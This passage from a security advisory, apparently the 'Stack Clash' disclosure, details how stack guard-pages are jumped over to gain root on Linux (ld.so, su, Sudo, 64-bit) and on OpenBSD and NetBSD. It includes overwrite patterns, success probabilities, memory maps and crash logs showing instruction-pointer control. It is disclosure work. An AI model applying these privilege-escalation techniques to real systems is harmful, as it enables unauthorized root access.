.got: although protected by Full RELRO (Full RELocate Read-Only, GNU_RELRO and BIND_NOW) the .got is still writable when we smash it in _dl_init_paths(); however, within ld.so, the .got is written to but never read from, and we therefore discarded this approach;
-
.dynamic: our favored approach.
On i386, the .dynamic section is an array of Elf32_Dyn structures (an int32 d_tag, and the union of uint32 d_val and uint32 d_ptr) that contains entries such as:
-
DT_STRTAB, a pointer to the PIE's .dynstr section (a read-only string table): its d_tag (DT_STRTAB) is read (by elf_get_dynamic_info()) before we smash it in _dl_init_paths(), but its d_ptr is read (by _dl_map_object_deps()) after we smash it in _dl_init_paths();
-
DT_NEEDED, an offset into the .dynstr section: the pathname of a dependent library that must be loaded by _dl_map_object_deps().
If we overwrite the entire .dynamic section with the following 8-byte pattern (an Elf32_Dyn structure):
-
a DT_NEEDED d_tag,
-
a d_val equal to half the address of our own string table on the stack (16MB of argument strings, enough to defeat the 8MB stack randomization),
then _dl_map_object_deps() reads the pathname of this dependent library from DT_STRTAB.d_ptr + DT_NEEDED.d_val = our_strtab/2 + our_strtab/2 = our_strtab, and loads our own library, as root. This 8-byte pattern is simple, but poses two problems:
-
DT_NEEDED is an int32 equal to 1, but we smash the .dynamic section with a string copy that cannot contain null-bytes: to solve this first problem we use DT_AUXILIARY instead, which is equivalent but equal to 0x7ffffffd;
-
ld.so crashes before it returns from dl_main() (before it calls _dl_init() and executes our library's _init() constructor):
. in _dl_map_object_deps() because of our DT_AUXILIARY entry;
. in version_check_doit() because we overwrote the DT_VERNEED entry;
. in _dl_relocate_object() because we overwrote the DT_REL, DT_RELSZ, and DT_RELCOUNT entries.
To solve this second problem, we could overwrite the .dynamic section with a more complicated pattern that repairs these entries, but our exploit's probability of success would decrease significantly.
Instead, we take control of ld.so's execution flow as soon as _dl_map_object_deps() loads our library:
-
our library contains three executable LOAD segments,
-
but only the first and last segments are sanity-checked by _dl_map_object_from_fd() and _dl_map_segments(),
-
and all segments except the first are mmap()ed with MAP_FIXED by _dl_map_segments(),
-
so we can mmap() our second segment anywhere -- we mmap() it on top of ld.so's executable segment,
-
and return into our own code (instead of ld.so's) as soon as this second mmap() system-call returns.
Probabilities
The "hwcap" exploit taught us that this ".dynamic" exploit's probability of success depends on:
-
the size of the cushion below the .dynamic section, which can absorb the excess of "good-write" without crashing: the padding bytes between the start of the PIE's read-write segment and the start of its first read-write section;
-
the size of the cushion above the .dynamic section, which can absorb the excess of "good-write" and "bad-write" without crashing: the .got, .data, and .bss sections.
If we guarantee that (cushion above .dynamic > good-write + bad-write), then the theoretical probability of success is approximately:
MIN(cushion below .dynamic, good-write) / max stack randomization
The maximum size of the cushion below the .dynamic section is 4KB (one page) and hence the maximum probability of success is 4KB/8MB=1/2048. In practice, on Ubuntu 16.04.2:
-
the highest probability is 1/2589 (/bin/su) and the lowest probability is 1/9225 (/usr/lib/eject/dmcrypt-get-device);
-
each run uses 1GB of memory and takes 1.5 seconds (on a 4GB Virtual Machine);
-
this ld.so ".dynamic" exploit has a good chance of obtaining a root-shell after 2589 * 1.5 seconds ~= 1 hour.
======================================================================== IV.1.5. /bin/su ========================================================================
As we were drafting this advisory, we discovered a general method for completing Step 1 (Clash) of the stack-clash exploitation: the Linux kernel limits the size of the command-line arguments and environment variables to 1/4 of the RLIMIT_STACK, but it imposes this limit on the argument and environment strings, not on the argv[] and envp[] pointers to these strings (CVE-2017-1000365).
On i386, if we set RLIMIT_STACK to RLIM_INFINITY, the maximum number of argv[] and envp[] pointers is 1G (1/4 of the RLIMIT_STACK, divided by 1B, the minimum size of an argument or environment string). In theory, the maximum size of the initial stack is therefore 1G*(1B+4B)=5GB. In practice, this would exhaust the address-space and allows us to clash the stack with the memory region that is mapped below, without an application-specific memory leak.
This discovery allowed us to write alternative versions of our stack-clash exploits; for example:
-
an ld.so "hwcap" exploit against Ubuntu: we replace the LD_AUDIT memory leak with 2GB of stack memory (1GB of argument and environment strings, and 1GB of argv[] and envp[] pointers) and replace the LD_AUDIT library with an LD_PRELOAD library;
-
an ld.so ".dynamic" exploit against systems vulnerable to offset2lib: we reach the end of the PIE's read-write segment with only 128MB of stack memory (argument and environment strings and pointers).
These proofs-of-concept demonstrate a general method for completing Step 1 (Clash), but they are much slower than their original versions (10-20 seconds per run) because they pass millions of argv[] and envp[] pointers to execve().
Moreover, this discovery allowed us to exploit SUID binaries through general methods that do not depend on application-specific or ld.so vulnerabilities; if a SUID binary calls setlocale(LC_ALL, ""); and gettext() (or a derivative such as strerror() or _()), then it is exploitable:
-
Step 1: we clash the stack with the heap through millions of argument and environment strings and pointers;
-
Step 2: we consume the initial stack expansion with 128KB of argument and environment pointers;
-
Step 3: we jump over the stack guard-page and into the heap with the alloca()tion of the LANGUAGE environment variable in gettext();
-
Step 4a: we smash the stack with the malloc()ation of the OUTPUT_CHARSET environment variable in gettext() and thus gain control of eip.
For example, we exploited Debian's /bin/su (from the shadow-utils): its main() function calls setlocale() and save_caller_context(), which calls gettext() (through _()) if its stdin is not a tty.
Debian 8.5
Debian 8.5 is vulnerable to CVE-2016-3672: we set RLIMIT_STACK to RLIM_INFINITY and disable ASLR, clash the stack with the heap through 2GB of argument and environment strings and pointers (1GB of strings, 1GB of pointers), and return-into-libc's system() or __libc_dlopen():
-
the system() version uses 4GB of memory (2GB in the /bin/su process, and 2GB in the process fork()ed by system());
-
the __libc_dlopen() version uses only 2GB of memory, but ebp must point to our smashed data on the stack.
Debian 8.6
Debian 8.6 is vulnerable to offset2lib but not to CVE-2016-3672: we must brute-force the libc's ASLR (8 bits of entropy), but we clash the stack with the heap through only 128MB of argument and environment strings and pointers -- this /bin/su exploit can be parallelized.
======================================================================== IV.1.6. Grsecurity/PaX ========================================================================
https://grsecurity.net/
In 2010, grsecurity/PaX introduced a configurable stack guard-page: its size can be modified through /proc/sys/vm/heap_stack_gap and is 64KB by default (unlike the hard-coded 4KB stack guard-page in the vanilla kernel).
Unfortunately, a 64KB stack guard-page is not large enough, and can be jumped over with ld.so or gettext() (CVE-2017-1000377); for example, we were able to gain eip control against Sudo, but we were unable to obtain a root-shell or gain eip control against another application, because grsecurity/PaX imposes the following security measures:
-
it restricts the RLIMIT_STACK of SUID binaries to 8MB, which prevents us from switching to the legacy bottom-up mmap() layout (Step 1);
-
it restricts the argument and environment strings to 512KB, which prevents us from clashing the stack through megabytes of command-line arguments and environment variables (Step 1);
-
it randomizes the PIE and libraries with 16 bits of entropy (instead of 8 bits in vanilla), which prevents us from brute-forcing the ASLR and returning-into-libc (Step 4a);
-
it implements /proc/sys/kernel/grsecurity/deter_bruteforce (enabled by default), which limits the number of SUID crashes to 1 every 15 minutes (all Steps) and makes exploitation impossible.
Sudo
The vulnerability that we discovered in Sudo's get_process_ttyname() (CVE-2017-1000367) allows us to:
-
Step 1: clash the stack with 3GB of heap memory from the filesystem (directory pathnames) and bypass grsecurity/PaX's 512KB limit on the argument and environment strings;
-
Step 2: consume the 128KB of initial stack expansion with 3MB of recursive function calls and avoid grsecurity/PaX's 8MB restriction on the RLIMIT_STACK;
-
Step 3: jump over grsecurity/PaX's 64KB stack guard-page with a 128KB (MAX_ARG_STRLEN) alloca()tion of the LANGUAGE environment variable in gettext();
-
Step 4a: smash the stack with a 128KB (MAX_ARG_STRLEN) malloc()ation of the OUTPUT_CHARSET environment variable in gettext() -- the "smashing-chunk" -- and thus gain control of eip.
In Step 1, we nearly exhaust the address-space until finally malloc() switches from brk() to 1MB mmap()s and reaches the start of the stack with the very last 1MB mmap() that we allocate. The exact amount of memory that we must allocate to reach the stack with our last 1MB mmap() depends on the sum of three random variables: the 256MB randomization of the stack, the 64MB randomization of the heap, and the 1MB randomization of the NULL region.
To maximize the probability of jumping over the stack guard-page, into our last 1MB mmap() below the stack, and overwriting a return-address on the stack with our smashing-chunk:
-
(Step 1) we must allocate the mean amount of memory to reach the stack with our last 1MB mmap(): the sum of three uniform random variables is not uniform (https://en.wikipedia.org/wiki/Irwin-Hall_distribution), but the values within the 256MB-64MB-1MB=191MB plateau at the center of this bell-shaped probability distribution occur with a uniform and maximum probability of (1MB64MB)/(1MB64MB*256MB)=1/256MB;
-
(Step 1) the end of our last 1MB mmap() must be allocated at a distance within [stack guard-page (64KB), guard-page jump (128KB)] below the start of the stack: the guard-page jump (Step 3) then lands at a distance d within [0, guard-page jump - stack guard-page (64KB)] below the end of our last 1MB mmap();
-
(Step 4a) the end of our smashing-chunk must be allocated at the end of our last 1MB mmap(), above the landing-point of the guard-page jump: our smashing-chunk then overwrites a return-address on the stack, below the landing-point of the guard-page jump.
In theory, this probability is roughly:
SUM(d = 1; d < guard-page jump - stack guard-page; d++) d / (256MB*1MB)
~= ((guard-page jump - stack guard-page)^2 / 2) / (256MB*1MB)
~= 1 / 2^17
In practice, we tested this Sudo proof-of-concept on an i386 Debian 8.6 protected by the linux-grsec package from the jessie-backports, but we manually disabled /proc/sys/kernel/grsecurity/deter_bruteforce:
-
it uses 3GB of memory, and 800K on-disk inodes;
-
it takes 5.5 seconds per run (on a 4GB Virtual Machine);
-
it has a good chance of gaining eip control after 2^17 * 5.5 seconds = 200 hours; in our test:
PAX: From 192.168.56.1: execution attempt in: , 1b068000-a100d000 1b068000 PAX: terminating task: /usr/bin/sudo( 1 ):25465, uid/euid: 1000/0, PC: 41414141, SP: b8844f30 PAX: bytes at PC: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 PAX: bytes at SP-4: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
However, brute-forcing the ASLR to obtain a root-shell would take ~1500 years and makes exploitation impossible.
Moreover, if we enable /proc/sys/kernel/grsecurity/deter_bruteforce, gaining eip control would take ~1365 days, and obtaining a root-shell would take thousands of years.
======================================================================== IV.1.7. 64-bit exploitation ========================================================================
Introduction
The address-space of a 64-bit process is so vast that we initially thought it was impossible to clash the stack with another memory region; we were wrong.
Linux's execve() first randomizes the end of the mmap region (which grows top-down by default) and then randomizes the end of the stack region (which grows down, on x86). On amd64, the initial mmap-stack distance (between the end of the mmap region and the end of the stack region) is minimal when RLIMIT_STACK is lower than or equal to MIN_GAP (mmap_base() in arch/x86/mm/mmap.c), and then:
- the end of the mmap region is equal to (as calculated by arch_pick_mmap_layout() in arch/x86/mm/mmap.c):
mmap_end = TASK_SIZE - MIN_GAP - arch_mmap_rnd()
where:
. TASK_SIZE is the highest address of the user-space (0x7ffffffff000)
. MIN_GAP = 128MB + stack_maxrandom_size()
. stack_maxrandom_size() is ~16GB (or ~4GB if the kernel is vulnerable to CVE-2015-1593, but we do not consider this case here)
. arch_mmap_rnd() is a random variable in the [0B,1TB] range
- the end of the stack region is equal to (as calculated by randomize_stack_top() in fs/binfmt_elf.c):
stack_end = TASK_SIZE - "stack_rand"
where:
. "stack_rand" is a random variable in the [0, stack_maxrandom_size()] range
- the initial mmap-stack distance is therefore equal to:
stack_end - mmap_end = MIN_GAP + arch_mmap_rnd() - "stack_rand"
= 128MB + stack_maxrandom_size() - "stack_rand" + arch_mmap_rnd()
= 128MB + StackRand + MmapRand
where:
. StackRand = stack_maxrandom_size() - "stack_rand", a random variable in the [0B,16GB] range
. MmapRand = arch_mmap_rnd(), a random variable in the [0B,1TB] range
Consequently, the minimum initial mmap-stack distance is only 128MB (CVE-2017-1000379), and:
-
On kernels vulnerable to offset2lib, the heap of a PIE (which is mapped at the end of the mmap region) is mapped below and close to the stack with a good probability (~1/700). We can therefore clash the stack with the heap in Step 1, jump over the stack guard-page and into the heap in Step 3, and smash the stack with the heap and gain control of rip in Step 4a (after 6 hours on average). However, because the addresses of all executable regions contain null-bytes, and because most of our stack-smashes in Step 4a are string operations (except the getaddrinfo() method), we were unable to transform such a rip control into arbitrary code execution.
-
On all kernels, either a PIE or ld.so is mapped directly below the stack with a good probability (~1/17000) -- the end of the PIE's or ld.so's read-write segment is then equal to the start of the stack guard-page. We can therefore adapt our ld.so "hwcap" exploit to amd64 and obtain root privileges through most SUID binaries on most Linux distributions (after 5 hours on average).
Kernels vulnerable to offset2lib, local Exim proof-of-concept
Exim's binary is usually a PIE, mapped at the end of the mmap region; and the heap, which always grows up and is randomized above the end of the binary, is therefore randomized above the end of the mmap region (arch_randomize_brk() in arch/x86/kernel/process.c):
heap_start = mmap_end + "heap_rand"
where "heap_rand" is a random variable in the [0B,32MB] range (negligible and ignored here). For example, on Debian 8.5:
cat /proc/"pidof -s /usr/sbin/exim4"/maps
... 7fa6410d6000-7fa6411c8000 r-xp 00000000 08:01 14574 /usr/sbin/exim4 7fa6413b4000-7fa6413bd000 rw-p 00000000 00:00 0 7fa6413c5000-7fa6413c7000 rw-p 00000000 00:00 0 7fa6413c7000-7fa6413c9000 r--p 000f1000 08:01 14574 /usr/sbin/exim4 7fa6413c9000-7fa6413d2000 rw-p 000f3000 08:01 14574 /usr/sbin/exim4 7fa6413d2000-7fa6413d7000 rw-p 00000000 00:00 0 7fa641b34000-7fa641b76000 rw-p 00000000 00:00 0 [heap] 7ffdf3e53000-7ffdf3ed6000 rw-p 00000000 00:00 0 [stack] 7ffdf3f3c000-7ffdf3f3e000 r-xp 00000000 00:00 0 [vdso] 7ffdf3f3e000-7ffdf3f40000 r--p 00000000 00:00 0 [vvar] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
To reach the start of the stack with the end of the heap (through the -p memory leak in Exim) in Step 1 of our stack-clash, we must minimize the initial heap-stack distance, and hence the initial mmap-stack distance, and set RLIMIT_STACK to MIN_GAP (~16GB). This limits the size of our -p argument strings on the stack to 16GB/4=4GB, and because we then leak the same amount of heap memory through -p, the initial heap-stack distance must be:
-
longer than 4GB (the stack must be able to contain the -p argument strings);
-
shorter than 8GB (the end of the heap must be able to reach the start of the stack during the -p memory leak).
The initial heap-stack distance (approximately the initial mmap-stack distance, 128MB + StackRand + MmapRand, but we ignore the 128MB term here) follows a trapezoidal Irwin-Hall distribution, and the [4GB,8GB] range is within the first non-uniform area of this trapezoid, so the probability that the initial heap-stack distance is in this range is:
SUM(d = 4GB; d < 8GB; d++) d / (16GB * 1TB)
= SUM(d = 0; d < 4GB; d++) (4GB + d) / (16GB * 1TB)
= SUM(d = 0; d < 2^32; d++) (2^32 + d) / (2^34 * 2^40)
~= ((2^32)(2^32) + (2^32)(2^32) / 2) / (2^74)
~= 3 / 2^11
~= 1 / 682
The probability of gaining rip control after the heap reaches the stack is ~1/16 (as calculated by a 64-bit version of the small helper program presented in IV.1.1.), and the final probability of gaining rip control with our local Exim proof-of-concept is:
(3 / 2^11) * (1/16) ~= 1 / 10922
On our 8GB Debian 8.7 test machine, this proof-of-concept takes roughly 2 seconds per run, and has a good chance of gaining rip control after 10922 * 2 seconds ~= 6 hours:
gdb /usr/sbin/exim4 core.6049
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1 ... This GDB was configured as "x86_64-linux-gnu". Core was generated by `/usr/sbin/exim4 -p0000000000000000000000000000000000000000000000000000000000000'. Program terminated with signal SIGSEGV, Segmentation fault.
0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:41
41 ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory. (gdb) x/i $rip => 0x7ffab1be7061 <__memcpy_sse2_unaligned+65>: retq (gdb) x/xg $rsp 0x7ffb9b294a48: 0x4141414141414141
Kernels vulnerable to offset2lib, ld.so ".dynamic" exploit
Since kernels vulnerable to offset2lib map PIEs below and close to the stack, we tried to adapt our ld.so ".dynamic" exploit to amd64. MIN_GAP guarantees a minimum distance of 128MB between the theoretical end of the mmap region and the end of the stack, but the stack then grows down to store the argument and environment strings, and may therefore occupy the theoretical end of the mmap region (where nothing has been mapped yet). Consequently, the end of the mmap region (where the PIE will be mapped) slides down to the first available address, directly below the stack guard-page and the initial stack expansion (described in II.3.2.):
7ffbb7e51000-7ffbb7e53000 r-xp 00000000 fd:03 4465810 /tmp/test64 ... 7ffbb8053000-7ffbb808c000 rw-p 00002000 fd:03 4465810 /tmp/test64 7ffbb808d000-7ffc180ae000 rw-p 00000000 00:00 0 [heap] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Note: in this example, the "[stack]" is, again, incorrectly displayed as the "[heap]" by show_map_vma() (in fs/proc/task_mmu.c).
This layout is ideal for our stack-clash exploits, but poses an unexpected problem: because the PIE is mapped directly below the stack, the stack cannot grow anymore, and the only free stack space is the initial stack expansion (128KB) minus the argv[] and envp[] pointers (which are stored there, as mentioned in II.3.2.):
-
on the one hand, many argv[] and envp[] pointers, and hence many argument and environment strings, result in a higher probability of mapping the PIE directly below the stack;
-
on the other hand, many argv[] and envp[] pointers consume most of the initial stack expansion and do not leave enough free stack space for ld.so to operate.
In practice, we pass 96KB of argv[] pointers to execve(), thus leaving 32KB of free stack space for ld.so, and since the size of a pointer is 8B, and the maximum size of an argument string is 128KB, we also pass 96KB/8B*128KB=1.5GB of argument strings to execve(). The resulting probability of mapping the PIE directly below the stack is:
SUM(s = 0; s < 1.5GB - 128MB; s++) s / (16GB * 1TB)
~= ((1.5GB - 128MB)^2 / 2) / (16GB * 1TB)
~= 1 / 17331
On a 4GB Virtual Machine, each run takes 1 second, and 17331 runs take roughly 5 hours. But we cannot add more uncertainty to this exploit, and because of the problems discussed in IV.1.4. (null-bytes in DT_NEEDED, but also in DT_AUXILIARY on 64-bit, etc), we were unable to overwrite the .dynamic section with a pattern that does not significantly decrease this exploit's probability of success.
All kernels, ld.so "hwcap" exploit
Despite this failure, we had an intuition: when the PIE is mapped directly below the stack, the stack layout should be deterministic -- rsp should point into the 128KB of initial stack expansion, at a 32KB offset above the start of the stack, and the only entropy should be the 8KB of sub-page randomization within the stack (arch_align_stack() in arch/x86/kernel/process.c). The following output of our small test program confirmed this intuition (the fourth field is the distance between the start of the stack and our main()'s rsp when the PIE is mapped directly below the stack):
$ grep -w sp test64.out | sort -nk4 sp 0x7ffbc271ff38 -> 28472 sp 0x7ffbb95ccff8 -> 28664 sp 0x7ffbaf062678 -> 30328 sp 0x7ffbb08736e8 -> 30440 sp 0x7ffbbc616d18 -> 32024 sp 0x7ffbc1a0fdb8 -> 32184 sp 0x7ffbb9c28ff8 -> 32760 sp 0x7ffbdbf4c178 -> 33144 sp 0x7ffbb39bc1c8 -> 33224 sp 0x7ffbebb86838 -> 34872
Surprisingly, the output of this test program contained additional valuable information:
7ffbb7e51000-7ffbb7e53000 r-xp 00000000 fd:03 4465810 /tmp/test64 7ffbb8034000-7ffbb8037000 rw-p 00000000 00:00 0 7ffbb804d000-7ffbb804e000 rw-p 00000000 00:00 0 7ffbb804e000-7ffbb8050000 r--p 00000000 00:00 0 [vvar] 7ffbb8050000-7ffbb8052000 r-xp 00000000 00:00 0 [vdso] 7ffbb8052000-7ffbb8053000 r--p 00001000 fd:03 4465810 /tmp/test64 7ffbb8053000-7ffbb808c000 rw-p 00002000 fd:03 4465810 /tmp/test64 7ffbb808d000-7ffc180ae000 rw-p 00000000 00:00 0 [heap] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
- the distance between the end of the read-execute segment of our test program and the start of its read-only and read-write segments is approximately 2MB; indeed, for every ELF on amd64:
$ readelf -a /usr/bin/su | grep -wA1 LOAD LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x00000000000061b4 0x00000000000061b4 R E 200000 LOAD 0x0000000000006888 0x0000000000206888 0x0000000000206888 0x0000000000000798 0x00000000000007d0 RW 200000
$ readelf -a /lib64/ld-linux-x86-64.so.2 | grep -wA1 LOAD LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x000000000001fad0 0x000000000001fad0 R E 200000 LOAD 0x000000000001fb60 0x000000000021fb60 0x000000000021fb60 0x000000000000141c 0x00000000000015e8 RW 200000
- several objects are actually mapped inside this ~2MB hole: [vdso], [vvar], and two anonymous mappings (7ffbb804d000-7ffbb804e000 and 7ffbb8034000-7ffbb8037000).
This discovery allowed us to adapt our ld.so "hwcap" exploit to amd64:
-
we choose hardware-capabilities that are small enough to be mapped inside this ~2MB hole, but large enough to defeat the 8KB sub-page randomization of the stack;
-
we jump over the stack guard-page, and over the read-only and read-write segments of the PIE, and exploit ld.so as we did on i386.
This exploit's probability of success is therefore 1 when the PIE is mapped directly below the stack, and its final probability of success is ~1/17331: it takes 1 second per run, and has a good chance of obtaining a root-shell after 5 hours. Moreover, it works on all kernels: if a SUID binary is not a PIE, or if the kernel is not vulnerable to offset2lib, we simply jump over ld.so's read-write segment, instead of the PIE's. For example, on Fedora 25, when the exploit succeeds and loads our own library /var/tmp/a (the 7ffbabbef000-7ffbabca7000 mapping contains the hardware-capabilities that we smash):
55a0c9e8d000-55a0c9e91000 r-xp 00000000 fd:00 112767 /usr/libexec/cockpit-polkit 55a0ca091000-55a0ca093000 rw-p 00004000 fd:00 112767 /usr/libexec/cockpit-polkit 7ffbab603000-7ffbab604000 r-xp 00000000 fd:00 4866583 /var/tmp/a 7ffbab604000-7ffbab803000 ---p 00001000 fd:00 4866583 /var/tmp/a 7ffbab803000-7ffbab804000 r--p 00000000 fd:00 4866583 /var/tmp/a 7ffbab804000-7ffbaba86000 rw-p 00000000 00:00 0 7ffbaba86000-7ffbabaab000 r-xp 00000000 fd:00 4229637 /usr/lib64/ld-2.24.so 7ffbabbef000-7ffbabca7000 rw-p 00000000 00:00 0 7ffbabca7000-7ffbabca9000 r--p 00000000 00:00 0 [vvar] 7ffbabca9000-7ffbabcab000 r-xp 00000000 00:00 0 [vdso] 7ffbabcab000-7ffbabcad000 rw-p 00025000 fd:00 4229637 /usr/lib64/ld-2.24.so 7ffbabcad000-7ffbabcae000 rw-p 00000000 00:00 0 7ffbabcaf000-7ffc0bcf0000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
======================================================================== IV.2. OpenBSD ========================================================================
======================================================================== IV.2.1. Maximum RLIMIT_STACK vulnerability (CVE-2017-1000372) ========================================================================
The OpenBSD kernel limits the maximum size of the user-space stack (RLIMIT_STACK) to MAXSSIZ (32MB); the execve() system-call allocates a MAXSSIZ memory region for the stack and divides it in two:
-
the second part, effectively the user-space stack, is mapped PROT_READ|PROT_WRITE at the end of this stack memory region, and occupies RLIMIT_STACK bytes (by default 8MB for root processes, and 4MB for user processes);
-
the first part, effectively a large stack guard-page, is mapped PROT_NONE at the start of this stack memory region, and occupies MAXSSIZ - RLIMIT_STACK bytes.
Unfortunately, we discovered that if an attacker sets RLIMIT_STACK to MAXSSIZ, he eliminates the PROT_NONE part of the stack region, and hence the stack guard-page itself (CVE-2017-1000372). For example:
sh -c 'ulimit -S -s; procmap -a -P'
8192 Start End Size Offset rwxpc RWX I/W/A Dev Inode - File ... 14cf6000-14cfafff 20k 00000000 r-xp+ (rwx) 1/0/0 00:03 52375 - /usr/sbin/procmap [0xdb29ce10] ... 84a7b000-84a7bfff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ] cd7db000-cefdafff 24576k 00000000 ---p+ (rwx) 1/0/0 00:00 0 - [ stack ] cefdb000-cf7cffff 8148k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ] cf7d0000-cf7dafff 44k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ] total 10348k
sh -c 'ulimit -S -s ulimit -H -s; procmap -a -P'
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File ... 1a47f000-1a483fff 20k 00000000 r-xp+ (rwx) 1/0/0 00:03 52375 - /usr/sbin/procmap [0xdb29ce10] ... 8a3c8000-8a3c9fff 8k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ] cd7c9000-cf7bffff 32732k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ] cf7c0000-cf7c8fff 36k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ] total 33992k
A remote attacker cannot exploit this vulnerability, because he cannot modify RLIMIT_STACK; but a local attacker can set RLIMIT_STACK to MAXSSIZ, and:
-
Step 1: malloc()ate almost 2GB of heap memory, until the heap reaches the start of the stack region;
-
Steps 2 and 3: consume MAXSSIZ (32MB) of stack memory, until the stack-pointer reaches the start of the stack region (Step 2) and moves into the heap (Step 3);
-
Step 4: smash the stack with the heap (Step 4a) or smash the heap with the stack (Step 4b).
======================================================================== IV.2.2. Recursive qsort() vulnerability (CVE-2017-1000373) ========================================================================
To complete Step 2, a recursive function is needed, and the first possibly recursive function that we investigated is qsort(). On the one hand, glibc's _quicksort() function (in stdlib/qsort.c) is non-recursive (iterative): it uses a small, specialized stack of partition structures (two pointers, low and high), and guarantees that no more than 32 partitions (on i386) or 64 partitions (on amd64) are pushed onto this stack, because it always pushes the larger of two sub-partitions and iterates on the smaller partition.
On the other hand, BSD's qsort() function is recursive: it always recurses on the first sub-partition, and iterates on the second sub-partition; but instead, it should always recurse on the smaller sub-partition, and iterate on the larger sub-partition (CVE-2017-1000373 in OpenBSD, CVE-2017-1000378 in NetBSD, and CVE-2017-1082 in FreeBSD).
In theory, because BSD's qsort() is not randomized, an attacker can construct a pathological input array of N elements that causes qsort() to deterministically recurse N times. In practice, because this qsort() uses the median-of-three medians-of-three selection of a pivot element (the "ninther"), our attack constructs an input array of N elements that causes qsort() to recurse N/4 times.
======================================================================== IV.2.3. /usr/bin/at proof-of-concept ========================================================================
/usr/bin/at is SGID-crontab (which can be escalated to full root privileges) because it must be able to create ("at -t"), list ("at -l"), and remove ("at -r") job-files in the /var/cron/atjobs directory:
-r-xr-sr-x 4 root crontab 31376 Jul 26 2016 /usr/bin/at drwxrwx--T 2 root crontab 512 Jul 26 2016 /var/cron/atjobs
To demonstrate that OpenBSD's RLIMIT_STACK and qsort() vulnerabilities can be transformed into powerful primitives such as heap corruption, we developed a proof-of-concept against "at -l" (the list_jobs() function):
-
Step 1 (Clash): first, list_jobs() malloc()ates an atjob structure for each file in /var/cron/atjobs -- if we create 40M job-files, then the heap reaches the stack, but we do not exhaust the address-space;
-
Steps 2 and 3 (Run and Jump): second, list_jobs() qsort()s the malloc()ated jobs -- if we construct their time-stamps with our qsort() attack, then we can cause qsort() to recurse 40M/4=10M times and consume at least 10M*4B=40MB of stack memory (each recursive call to qsort() consumes at least 4B, the return-address) and move the stack-pointer into the heap;
-
Step 4b (Smash the heap with the stack): last, list_jobs() free()s the malloc()ated jobs, and abort()s with an error message -- OpenBSD's hardened malloc() implementation detects that the heap has been corrupted by the last recursive calls to qsort().
This naive version of our /usr/bin/at proof-of-concept poses two major problems:
- Our pathological input array of N=40M elements cannot be sorted (Step 2 never finishes because it exhibits qsort()'s worst-case behavior, N^2). To solve this problem, we divide the input array in two:
. the first, pathological part contains only n=(33MB/176B)4=768K elements that are needed to complete Steps 2 and 3, and cause qsort() to recurse n/4 times and consume (n/4)176B=33MB of stack memory (MAXSSIZ+1MB) as each recursive call to qsort() consumes 176B of stack memory;
. the second, innocuous part contains the remaining N-n=39M elements that are needed to complete Step 1, but not Steps 2 and 3, and are therefore swapped into the second, iterative partition of the first recursive call to qsort().
- We were unable to create 40M files in /var/cron/atjobs: after one week, OpenBSD's default filesystem (ffs) had created only 4M files, and the rate of file creation had dropped from 25 files/second to 4 files/second. We did not solve this problem, but nevertheless wanted to validate our proof-of-concept:
. we transformed it into an LD_PRELOAD library that intercepts calls to readdir() and fstatat(), and pretends that our 40M files in /var/cron/atjobs exist;
. we made /var/cron/atjobs world-readable and LD_PRELOADed our library into a non-SGID copy of /usr/bin/at;
. after about an hour, "at" reports random heap corruptions:
chmod o+r /var/cron/atjobs
chmod o+r /var/cron/at.deny
$ ulimit -c 0
$ ulimit -S -d ulimit -H -d
$ ulimit -S -s ulimit -H -s
$ ulimit -S -a
...
coredump(blocks) 0
data(kbytes) 3145728
stack(kbytes) 32768
...
$ cp /usr/bin/at .
$ LD_PRELOAD=./OpenBSD_at.so ./at -l -v -q x > /dev/null initializing jobkeys finalizing jobkeys reading jobs 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% sorting jobs at(78717) in free(): error: chunk info corrupted Abort trap
$ LD_PRELOAD=./OpenBSD_at.so ./at -l -v -q x > /dev/null initializing jobkeys finalizing jobkeys reading jobs 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% sorting jobs at(14184) in free(): error: modified chunk-pointer 0xcd6d0120 Abort trap
======================================================================== IV.3. NetBSD ========================================================================
Like OpenBSD, NetBSD is vulnerable to the maximum RLIMIT_STACK vulnerability (CVE-2017-1000374): if a local attacker sets RLIMIT_STACK to MAXSSIZ, he eliminates the PROT_NONE part of the stack region -- the stack guard-page itself. Unlike OpenBSD, however, NetBSD:
-
defines MAXSSIZ to 64MB on i386 (128MB on amd64);
-
maps the run-time link-editor ld.so directly below the stack region, even if ASLR is enabled (CVE-2017-1000375):
$ sh -c 'ulimit -S -s; pmap -a -P' 2048 Start End Size Offset rwxpc RWX I/W/A Dev Inode - File 08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 21706 - /usr/bin/pmap [0xc5c8f0b8] ... bbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580] bbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ] bbc00000-bf9fffff 63488k 00000000 ---p+ (rwx) 1/0/0 00:00 0 - [ stack ] bfa00000-bfbeffff 1984k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ] bfbf0000-bfbfffff 64k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ] total 9528k
